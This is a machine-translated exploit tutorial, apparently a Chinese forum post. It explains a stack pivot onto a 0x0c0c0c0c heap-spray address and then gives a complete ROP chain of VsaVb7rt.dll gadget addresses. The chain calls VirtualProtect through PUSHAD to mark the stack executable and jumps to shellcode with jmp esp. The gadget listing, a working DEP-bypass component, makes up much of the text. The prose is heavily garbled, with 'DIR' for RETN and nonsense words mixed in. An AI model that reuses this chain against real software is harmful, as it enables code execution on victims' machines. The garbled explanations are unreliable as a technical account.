Please indicate the source, there is not the right place please correct me exchange. --- leibso
Exchange qq: 1032633253
1 illustrates in detail below
Although I constructed rop here it is carefully constructed, but can also be completely compressed space, in order to test the spacing between ret I set too big, but harmless.
2 Summary:
1. change the execution flow stack
xchg eax, esp; pop esi; ret; here I chose this statement, because eax is 0x0c0c0c0c, and eax position put a stack address (helpful to have can not be modified in the execution flow), the address points can not as a command (meaningless), but this time not modified error protection property. So I chose the top of the stack 0x0c0c0c0c position after the change of pop stack. The execution control to 0x0c0c0c10. This time 0x0c0c0c10 previous execution flow is not used, we can customize here ret instruction we want.
0x0c0c0cOc //0x0c0c0c20 0x0c0c0c10 //0x5e3229ed//add esp,0x10:pop esiret
//*** 0x0c0c0c20 //0x5e3229ed //add esp,0x10:pop siret
//***
0x0c0c0c34 //0x5e3229f0 //pop esi;ret; 0x0c0c0c38 //0x5e28f190 // xchg eaxesp:pop esiret:
Analysis: This is mainly performed in accordance with some features of the flow, to customize the ROP, to achieve handover execution flow stack. I thought that the relationship between the two call exp online this vulnerability is utilized, then I can only use a call it? I immediately hands-on test, indeed. So I saw my love crack direct assertion does not work, I feel sorry. The hands-on time to get hands-ah.
2. Modify protection attributes of stack space
0x5e329d12 , // POP EBP // DIR [VsaVb7rt.dll] 0x5e329d12 , // skip 4 bytes [VsaVb7rt.dll] 0x5e28f7a4 , // POP EBX // DIR [VsaVb7rt.dll] 0x00000201 , // 0x00000201-> EBX 0x5e292c9d , // POP EBX // DIR [VsaVb7rt.dll] 0x00000040 , // 0x00000040-> edx 0x5e34b61c , // XOR EDX, EDX // DIR [VsaVb7rt.dll] 0x5e34b5ee , // ADD EDX, EBX// POP EBX // DIR 0x10 [VsaVb7rt.dll] 0x41414141 , // Filler (compensate) 0x5e26098b , // POP ECX // DIR [VsaVb7rt.dll] 0x41414141 , // Filler (DIR offset compensation) 0x41414141 , // Filler (DIR offset compensation) 0x41414141 , // Filler (DIR offset compensation) 0x41414141 , // Filler (DIR offset compensation) 0x5e357285 , // & Writable location [VsaVb7rt.dll] --------这里是用来保存的OldProtect 0x5e25e6cc, // POP EDI // DIR [VsaVb7rt.dll] 0x5e267102 , // DIR (ROP NOP) [VsaVb7rt.dll] 0x5e25b1f6 , // POP ESI // DIR [VsaVb7rt.dll] 0x5e23aa93 , // JMP [EAX] [ VsaVb7rt.dll] 0x5e290c74 , // POP EAX // DIR [VsaVb7rt.dll] 0x74614224 , // ptr two & Virtual Protect () (skipped module Kriteriet, check if pointer is reliable!) [IAT msvcr80.Dll] 0x5e351384 , // PUSHAD // DIR [VsaVb7rt.dll] 0x5e287050, // ptr to 'jmp esp' [VsaVb7rt.dll]
Explanation: Here rop chain, many beginners may not be well understood, in fact, this is the order pushad pressure registers (eax, ecx, edx, ebx, esp, ebp, esi, edi), each register configured awakened data, and then by pushad want to order the data onto the stack, this time through the jmp esp springboard, this structure will be able to perform just the rop. Here you can build a stack performs virtualprotect need. Interested friends, you can hand-written some of the specific layout structure of the stack here to deepen this understanding rop chain.